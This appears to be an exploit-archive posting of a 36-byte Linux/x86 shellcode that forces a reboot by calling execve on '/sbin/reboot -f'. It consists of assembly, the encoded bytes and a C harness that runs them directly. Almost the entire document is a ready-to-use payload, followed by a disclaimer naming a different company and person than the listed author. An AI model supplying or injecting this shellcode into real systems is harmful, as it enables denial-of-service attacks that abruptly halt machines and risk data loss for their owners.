*****************************************************
* Linux/x86 Force Reboot shellcode 36 bytes
*****************************************************
* Author: Hamza Megahed
*****************************************************
* Twitter: @Hamza_Mega
*****************************************************
* blog: hamza-mega[dot]blogspot[dot]com
*****************************************************
* E-mail: hamza[dot]megahed[at]gmail[dot]com
*****************************************************
xor %eax,%eax
push %eax
push $0x746f6f62
push $0x65722f6e
push $0x6962732f
mov %esp,%ebx
push %eax
pushw $0x662d
mov %esp,%esi
push %eax
push %esi
push %ebx
mov %esp,%ecx
mov $0xb,%al
int $0x80
**********************************************
#include <stdio.h>
#include <string.h>
char *shellcode = "\x31\xc0\x50\x68\x62\x6f\x6f\x74\x68\x6e"
"\x2f\x72\x65\x68\x2f\x73\x62\x69\x89\xe3"
"\x50\x66\x68\x2d\x66\x89\xe6\x50\x56\x53"
"\x89\xe1\xb0\x0b\xcd\x80";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information